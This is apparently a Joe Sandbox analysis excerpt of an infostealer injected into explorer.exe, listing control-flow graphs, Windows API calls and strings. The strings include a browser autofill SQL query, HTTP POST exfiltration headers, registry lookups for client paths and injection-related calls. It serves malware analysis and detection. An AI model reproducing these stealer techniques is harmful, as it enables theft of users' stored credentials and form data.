                                                        control_flow_graph 665 129247-129275 666 1292e1-1292eb 665->666 667 129277-1292a3 665->667 668 12930e-129342 666->668 669 1292ed-1292f8 666->669 670 1292a5-1292a7 667->670 671 1292aa-1292be 667->671 672 129344-129346 668->672 673 129238-129245 670->673 674 1292a9 670->674 675 129381-1293a5 672->675 676 129349-12934c 672->676 673->665 674->671 678 1293ab-1293b8 675->678 679 12958d 675->679 676->672 677 12934e-12937a 676->677 680 1293e1 677->680 681 12937c 677->681 682 1293ca-1293cf 678->682 679->679 683 1293e3-1293e7 680->683 681->675 684 1293d1 682->684 685 1293f4-1293f7 683->685 686 1293e9 683->686 687 1293d3 684->687 688 1293c0-1293c5 684->688 691 129400-129402 685->691 692 1293f9-1293fe 685->692 689 129413-129418 686->689 690 1293eb-1293f2 686->690 694 1293d8-1293da 687->694 693 1293c6-1293c8 688->693 695 12941a-129423 689->695 696 12942b-12942d 689->696 690->685 690->689 691->694 692->691 693->682 693->684 694->683 697 1293dc-1293de 694->697 698 129425-129429 695->698 699 12949a-12949d 695->699 700 129436 696->700 701 12942f-129434 696->701 697->680 698->700 702 1294a2-1294a5 699->702 703 129404-129406 700->703 704 129438-12943b 700->704 701->700 709 1294a7-1294a9 702->709 707 129408-12940d 703->707 708 12940f-129411 703->708 705 129444 704->705 706 12943d-129442 704->706 705->703 711 129446-129448 705->711 706->705 707->708 712 129465-129474 708->712 709->702 710 1294ab-1294ae 709->710 710->702 713 1294b0-1294cc 710->713 714 129451-129455 711->714 715 12944a-12944f 711->715 716 129476-12947d 712->716 717 129484-129491 712->717 713->709 718 1294ce 713->718 714->711 719 129457 714->719 715->714 716->716 720 12947f 716->720 717->717 721 129493-129495 717->721 722 1294d4-1294d8 718->722 723 129462 719->723 724 129459-129460 719->724 720->693 721->693 725 1294da-1294f0 LoadLibraryA 722->725 726 12951f-129522 722->726 723->712 724->711 724->723 727 1294f1-1294f6 725->727 728 129525-12952c 726->728 727->722 729 1294f8-1294fa 727->729 730 129550-129580 VirtualProtect * 2 728->730 731 12952e-129530 728->731 733 129503-129510 GetProcAddress 729->733 734 1294fc-129502 729->734 732 129584-129588 730->732 735 129532-129541 731->735 736 129543-12954e 731->736 732->732 737 12958a 732->737 738 129512-129517 733->738 739 129519-12951c 733->739 734->733 735->728 736->735 737->679 738->727
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.0000000000127000.00000040.80000000.00040000.00000000.sdmp, Offset: 00127000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_127000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc7a8811aa7ef5604bc7b11fca259b6a22483fba2416c80796d7c4e5311e3372
                                                        • Instruction ID: f8f956276b81556480b3c1b19405860d93c04e5a3b5c81f61446289dd2956c78
                                                        • Opcode Fuzzy Hash: bc7a8811aa7ef5604bc7b11fca259b6a22483fba2416c80796d7c4e5311e3372
                                                        • Instruction Fuzzy Hash: 6BA15AB2A143A25FDB259E7CEDD06A07BA0FB52324F2D066DC5D1CB2C2E7605817C751
                                                        APIs
                                                          • Part of subcall function 000C1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 000C116F
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 000C4BB6
                                                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 000C4BBF
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                        • String ID:
                                                        • API String ID: 1675517319-0
                                                        • Opcode ID: 943dd28f87efffe5f8b9d8f090f8e32d6a59e4bb418e9047c1b4c3c806bb293b
                                                        • Instruction ID: da5cb47bbe52387c3e0a1681ea9d7598d9257fffee12612a3050b05896cbbd2f
                                                        • Opcode Fuzzy Hash: 943dd28f87efffe5f8b9d8f090f8e32d6a59e4bb418e9047c1b4c3c806bb293b
                                                        • Instruction Fuzzy Hash: 35E048319052106BC758BB70BD69FDF3B99AF96361F20C91DB26592492CB36CC818660
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocateProcess
                                                        • String ID:
                                                        • API String ID: 1357844191-0
                                                        • Opcode ID: f72606e3c0e245de1ac5a4330d0ddf5cb12277e236aa42a92db5c9bf23566a34
                                                        • Instruction ID: e0211589613c60c02250040143a06265190b4a18b4b9426254d9e333ec9573f1
                                                        • Opcode Fuzzy Hash: f72606e3c0e245de1ac5a4330d0ddf5cb12277e236aa42a92db5c9bf23566a34
                                                        • Instruction Fuzzy Hash: 93A002755511047BDD4857A49F0DA5A3528F7C4702F108544714586451DAA55444C721
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(001220A4,00000001,00000000,0000000A,00113127,000C28DA,00000000,?), ref: 000CBFFC
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 2bdd03f9feea4e02901fdc3fc3d187381d3a9339238f7048150a26f38f3ba999
                                                        • Instruction ID: 133605fa1fdf14a26a9ee541db0d16855689646c758a655b25552749d386d937
                                                        • Opcode Fuzzy Hash: 2bdd03f9feea4e02901fdc3fc3d187381d3a9339238f7048150a26f38f3ba999
                                                        • Instruction Fuzzy Hash: 53E0E53178475076E63077B87C47F9E25855BE0B10F704A6DFA10A91CBDFA781A11026

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 206 c3c40-c3c52 call c1b6a 209 c3c58-c3c95 call c1000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 114bec 206->209 210 c3dfa-c3e01 206->210 214 c3c9a-c3c9c 209->214 215 c3dec-c3df5 DeleteFileW call c1011 214->215 216 c3ca2-c3cba call feeb8 214->216 215->210 220 c3cc0-c3cdf call c1000 call e02ec 216->220 221 c3de3-c3de7 call 113848 216->221 227 c3d9f-c3da2 220->227 221->215 228 c3da8-c3db7 call dfb92 lstrlen 227->228 229 c3ce4-c3cfa call c1fa7 227->229 236 c3ddc-c3dde call c1011 228->236 237 c3db9-c3dd7 call c1798 * 3 228->237 234 c3cfc-c3d02 229->234 235 c3d08-c3d1d call c1fa7 229->235 234->235 238 c3d04 234->238 244 c3d1f-c3d25 235->244 245 c3d2b-c3d33 lstrlen 235->245 236->221 237->236 238->235 244->245 247 c3d27 244->247 248 c3d35-c3d3a lstrlen 245->248 249 c3d96-c3d9a call e02ec 245->249 247->245 248->249 252 c3d3c-c3d6f call c1000 wsprintfA lstrlen 248->252 249->227 256 c3d71-c3d81 call c102f 252->256 257 c3d83-c3d91 lstrcat call c1011 252->257 256->257 257->249
                                                        APIs
                                                          • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                          • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 000C3C6A
                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3C76
                                                        • DeleteFileW.KERNEL32(00000000), ref: 000C3C7D
                                                        • CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3C89
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 000C3D2F
                                                        • lstrlen.KERNEL32(00000000), ref: 000C3D36
                                                        • wsprintfA.USER32 ref: 000C3D55
                                                        • lstrlen.KERNEL32(00000000), ref: 000C3D61
                                                        • lstrcat.KERNEL32(00000000,?), ref: 000C3D89
                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 000C3DB2
                                                        • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 000C3DED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                        • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                        • API String ID: 2923052733-3488123210
                                                        • Opcode ID: 9fe7b3af864eb22a5069aa5cb1d3fec9ace8dfd2889d23c556998eae091e8bc9
                                                        • Instruction ID: c2bcd80db5c543a617e39dcba95eaf11e028253eaeca6157dfbb761b291e7096
                                                        • Opcode Fuzzy Hash: 9fe7b3af864eb22a5069aa5cb1d3fec9ace8dfd2889d23c556998eae091e8bc9
                                                        • Instruction Fuzzy Hash: 0C418030614341ABD715AB74DC85FBF7AE9AF8A744F00882CF846A7253DB36DD428762

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 418 c1333-c1385 call c1000 call c106c call c12a3 425 c1387-c139e 418->425 426 c13a0-c13a3 418->426 429 c13b0-c13b2 425->429 428 c13aa-c13ac 426->428 428->429 430 c13b8-c13ef RtlZeroMemory 429->430 431 c15cb-c15da call c1011 429->431 435 c13f5-c141a 430->435 436 c15c3-c15ca 430->436 439 c15bf 435->439 440 c1420-c1456 call c10b1 435->440 436->431 439->436 443 c145d-c1478 440->443 444 c1458 440->444 446 c147e-c1483 443->446 447 c15b5 443->447 444->443 448 c149d-c14c7 call c1000 wsprintfW 446->448 449 c1485-c1496 446->449 447->439 452 c14c9-c14cb 448->452 453 c14e0-c1509 448->453 449->448 454 c14cc-c14cf 452->454 460 c150f-c151b 453->460 461 c15a5-c15b0 call c1011 453->461 455 c14da-c14dc 454->455 456 c14d1-c14d6 454->456 455->453 456->454 458 c14d8 456->458 458->453 460->461 465 c1521-c1537 call c1000 460->465 461->447 468 c1539-c1544 465->468 469 c1558-c156f 468->469 470 c1546-c1553 call c102f 468->470 474 c1571 469->474 475 c1573-c157d 469->475 470->469 474->475 475->468 476 c157f-c1583 475->476 477 c159a-c15a1 call c1011 476->477 478 c1585 call c104c 476->478 477->461 481 c158a-c1594 RtlMoveMemory 478->481 481->477
                                                        APIs
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                          • Part of subcall function 000C106C: lstrlen.KERNEL32(003AB176,00000000,00000000,00000000,000C1366,75712B62,003AB176,00000000), ref: 000C1074
                                                          • Part of subcall function 000C106C: MultiByteToWideChar.KERNEL32(00000000,00000000,003AB176,00000001,00000000,00000000), ref: 000C1086
                                                          • Part of subcall function 000C12A3: RtlZeroMemory.NTDLL(?,00000018), ref: 000C12B5
                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 000C13C2
                                                        • wsprintfW.USER32 ref: 000C14B5
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C1594
                                                        Strings
                                                        • POST, xrefs: 000C1465
                                                        • Content-Type: application/x-www-form-urlencoded, xrefs: 000C14FB
                                                        • Accept: */*Referer: %S, xrefs: 000C14AF
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                        • API String ID: 3833683434-704803497
                                                        • Opcode ID: f75c3f53a8a409527eaab55de5ea5bf56e7f89f3ed84d96b06d9f90bf4f99658
                                                        • Instruction ID: 1a514e9f141677b8d8d38dac0240c6b57a8f42db93c0a9cec2361f5d12bb06ef
                                                        • Opcode Fuzzy Hash: f75c3f53a8a409527eaab55de5ea5bf56e7f89f3ed84d96b06d9f90bf4f99658
                                                        • Instruction Fuzzy Hash: 4D7155B0608341AFD7549F28DC84EAFBBE9EB89344F10492DF955C3252DB71D9448B92

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 509 ca40e-ca424 510 ca426-ca42a 509->510 511 ca4a2-ca4aa 509->511 513 ca42c-ca42f 510->513 514 ca431-ca441 510->514 512 ca4ae-ca4c8 511->512 515 ca4cc-ca4e3 ReadFile 512->515 513->511 513->514 516 ca469-ca4a0 memcpy 514->516 517 ca443 514->517 518 ca524-ca538 call ca2aa 515->518 519 ca4e5-ca4ee 515->519 516->512 520 ca44a-ca45a memcpy 517->520 521 ca445-ca448 517->521 523 ca45d 518->523 528 ca53e-ca553 memset 518->528 519->518 527 ca4f0-ca4ff call ca250 519->527 520->523 521->516 521->520 526 ca45f-ca466 523->526 527->515 531 ca501-ca51f call ca1c6 527->531 528->526 531->526
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: memcpy$FileReadmemset
                                                        • String ID: winRead
                                                        • API String ID: 2051157613-2759563040
                                                        • Opcode ID: 69bd8d8050483ac35828ca10b4e696c3b4e703440bfbec3ff2a071d762c3194d
                                                        • Instruction ID: ae3c229cc1cd92f986aedc8d904385eedd01eb6e8154fd3d065f857c3eb1b8d8
                                                        • Opcode Fuzzy Hash: 69bd8d8050483ac35828ca10b4e696c3b4e703440bfbec3ff2a071d762c3194d
                                                        • Instruction Fuzzy Hash: 0B316872709248ABC794DF58CC85E9F77E6EFC9318F845928F88587211D670EC458B93

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 534 c2e30-c2e55 StrStrIW 535 c2ebe-c2eec call c1000 RegOpenKeyExW 534->535 536 c2e57-c2e6c call c19e5 534->536 541 c2eee-c2efd 535->541 542 c2f68-c2f74 call c1011 535->542 543 c2ebc 536->543 544 c2e6e-c2e79 call c1bc5 536->544 546 c2f50-c2f5c RegEnumKeyExW 541->546 543->535 552 c2e7b-c2e85 call c1afe 544->552 553 c2eb5-c2eb7 call c1011 544->553 550 c2f5e-c2f62 RegCloseKey 546->550 551 c2eff-c2f26 call c1953 call c199d call c2e30 546->551 550->542 567 c2f2b-c2f4f call c1011 551->567 560 c2eae-c2eb0 call c1011 552->560 561 c2e87-c2e97 call c199d 552->561 553->543 560->553 561->560 568 c2e99-c2ea0 call c2c77 561->568 567->546 568->560
                                                        APIs
                                                        • StrStrIW.SHLWAPI(?,?), ref: 000C2E4B
                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 000C2EE4
                                                        • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000C2F54
                                                        • RegCloseKey.KERNEL32(?), ref: 000C2F62
                                                          • Part of subcall function 000C19E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                          • Part of subcall function 000C19E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                          • Part of subcall function 000C19E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                          • Part of subcall function 000C19E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                          • Part of subcall function 000C1BC5: lstrlenW.KERNEL32(00000000,00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1BCC
                                                          • Part of subcall function 000C1BC5: StrStrIW.SHLWAPI(00000000,.exe), ref: 000C1BF0
                                                          • Part of subcall function 000C1BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 000C1C05
                                                          • Part of subcall function 000C1BC5: lstrlenW.KERNEL32(00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1C1C
                                                          • Part of subcall function 000C1AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 000C1B16
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                        • String ID: PathToExe
                                                        • API String ID: 1799103994-1982016430
                                                        • Opcode ID: 3b1411a72cbd69e8bd35b9cd1a5aa96c1a9a2e93368d237d97e67d5290b58f5f
                                                        • Instruction ID: 26ee18a0ffe83efa59e30f6cb19543e95d49437544527146fba7fe573bb1303b
                                                        • Opcode Fuzzy Hash: 3b1411a72cbd69e8bd35b9cd1a5aa96c1a9a2e93368d237d97e67d5290b58f5f
                                                        • Instruction Fuzzy Hash: E2318B31604211AF8B19AF218C15EEF7AEAEFC9350F00852CF85997252EE75CD42DBA1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 572 c4a71-c4acf call c1000 wsprintfW RegCreateKeyExW 575 c4ae6-c4af5 call c1011 572->575 576 c4ad1-c4add RegCloseKey 572->576 576->575 577 c4adf-c4ae3 576->577 577->575
                                                        APIs
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • wsprintfW.USER32 ref: 000C4AA2
                                                        • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 000C4AC7
                                                        • RegCloseKey.ADVAPI32(?), ref: 000C4AD4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                        • String ID: %s\%08x$Software
                                                        • API String ID: 1800864259-1658101971
                                                        • Opcode ID: 00f92a919fe58cc2fcee024e23b5a8a25c02dcf311696da2a4ef3e62040a607d
                                                        • Instruction ID: d5e9b7e6a79eb13147b6ce8ff60bd94faf68ea9827fa1ea85af36e1d1f0cb5ef
                                                        • Opcode Fuzzy Hash: 00f92a919fe58cc2fcee024e23b5a8a25c02dcf311696da2a4ef3e62040a607d
                                                        • Instruction Fuzzy Hash: 02014271600008BFDB18CF90DC8AEFF77ACEB45344B10006EF900A3102EBB26E80D661

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 580 c4317-c433d _alloca_probe RegOpenKeyW 581 c43cf-c43d6 580->581 582 c4343-c436b RegEnumKeyExW 580->582 583 c436d 582->583 584 c43c4-c43ce RegCloseKey 582->584 585 c436e-c43c1 call c1953 call c199d call c418a call c1011 RegEnumKeyExW 583->585 584->581 594 c43c3 585->594 594->584
                                                        APIs
                                                        • _alloca_probe.NTDLL ref: 000C431C
                                                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 000C4335
                                                        • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000C4363
                                                        • RegCloseKey.ADVAPI32(?), ref: 000C43C8
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                          • Part of subcall function 000C418A: wsprintfW.USER32 ref: 000C4212
                                                          • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                          • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                        • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000C43B9
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                        • String ID:
                                                        • API String ID: 801677237-0
                                                        • Opcode ID: e67c078470a900192e25afb11323ca0b6dbc5fdacec239f00ca5753cfcd10387
                                                        • Instruction ID: 60560412b716ae3b9e27860e48b4edd336cd4f6e1dd72b7b9317e541cc3f2f5f
                                                        • Opcode Fuzzy Hash: e67c078470a900192e25afb11323ca0b6dbc5fdacec239f00ca5753cfcd10387
                                                        • Instruction Fuzzy Hash: 4C1182B1104201BFE7199B10CC45EFF77EDFB88344F00862DF889D2151EB759E889A62

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 595 cb87b-cb88a 596 cb88d-cb8e3 memset 595->596 597 cb8e5-cb8f3 call cb64b 596->597 598 cb903 596->598 603 cb8f9-cb901 597->603 604 cbaf3-cbaf9 597->604 599 cb905-cb914 call cb609 598->599 606 cb91a-cb923 call cb828 599->606 607 cbae3 599->607 603->599 612 cb929-cb941 606->612 613 cbad6-cbae1 call c68ec 606->613 609 cbae8-cbaf1 call c68ec 607->609 609->604 615 cb946-cb94d 612->615 616 cb943-cb944 612->616 613->609 618 cb950-cb962 615->618 616->618 620 cb965-cb97c CreateFileW 618->620 621 cb97e-cb983 620->621 622 cb9cb-cb9e4 call ca2aa 620->622 624 cb985-cb9aa call c6614 call cbb9f call c6620 621->624 625 cb9b6-cb9c9 call ca250 621->625 631 cb9e6-cb9fd call c68ec * 2 622->631 632 cba41-cba46 622->632 648 cb9ac-cb9b0 624->648 649 cb9b2 624->649 625->620 625->622 646 cb9ff-cba04 631->646 647 cba14-cba3c call ca1c6 call 114db2 631->647 634 cba48-cba52 632->634 635 cba54-cba6e call c68ec * 2 632->635 634->635 651 cba74 635->651 652 cba70-cba72 635->652 646->647 653 cba06-cba0f 646->653 647->604 648->622 648->649 649->625 655 cba79-cba8a 651->655 652->655 653->596 657 cba8c 655->657 658 cba90-cbaa2 call 1152ae 655->658 657->658 663 cbaa8-cbad4 658->663 664 cbaa4 658->664 663->604 664->663
                                                        APIs
                                                        • memset.NTDLL ref: 000CB8D5
                                                        • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 000CB96F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CreateFilememset
                                                        • String ID: psow$winOpen
                                                        • API String ID: 2416746761-4101858489
                                                        • Opcode ID: 947a24c0b705e832bcb66e80d866ba3e2d40e0e4410ba51a9bc00e7d755de889
                                                        • Instruction ID: b1bc4cd02a3218cecb152b020c0a59bdbdab4f0ce4d5c418b4c02a62c680d3a7
                                                        • Opcode Fuzzy Hash: 947a24c0b705e832bcb66e80d866ba3e2d40e0e4410ba51a9bc00e7d755de889
                                                        • Instruction Fuzzy Hash: 6271A271A04705AFC760DF28C882B5EBBE0FF88724F104A2DF9A497291D775D954CB92

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 740 c19e5-c19f5 741 c19fa-c1a26 RegOpenKeyExW 740->741 742 c19f7 740->742 743 c1a28-c1a44 RegQueryValueExW 741->743 744 c1aa2-c1aa7 741->744 742->741 747 c1a94-c1aa0 RegCloseKey 743->747 748 c1a46-c1a4c 743->748 745 c1aa9-c1ab9 call c19e5 744->745 746 c1abb 744->746 750 c1abd-c1ac3 745->750 746->750 747->744 747->746 748->747 751 c1a4e-c1a53 748->751 753 c1a5a-c1a7d call c1000 RegQueryValueExW 751->753 754 c1a55-c1a58 751->754 757 c1a7f-c1a81 753->757 758 c1a8b-c1a92 call c1011 753->758 754->747 754->753 757->747 759 c1a83-c1a89 757->759 758->747 759->747
                                                        APIs
                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                          • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                          • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                        • String ID:
                                                        • API String ID: 217796345-0
                                                        • Opcode ID: 9436d70d346cafe1e67ebee69c697f253d39a676a69db6c91e8f54c2c14d1aa1
                                                        • Instruction ID: 4fabfa7a8463360d32696f745825540dc6acb7b390ca864aeb677513e9c86ef9
                                                        • Opcode Fuzzy Hash: 9436d70d346cafe1e67ebee69c697f253d39a676a69db6c91e8f54c2c14d1aa1
                                                        • Instruction Fuzzy Hash: 0C21A37220A341AFE7288B21CD04FBFB7E9EFCA754F144A2DF98592152E621CD409722
                                                        APIs
                                                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 000C1ED5
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C1F0C
                                                        • RegCloseKey.ADVAPI32(?), ref: 000C1F98
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C1F82
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                        • String ID:
                                                        • API String ID: 1077800024-0
                                                        • Opcode ID: 2826345298574355285d7029a784bd56e530572d793e1daea05b92344c6963a2
                                                        • Instruction ID: 312801df20b4c6f434773809451dbac0668461fae7b5efeb80e90be44095c6c3
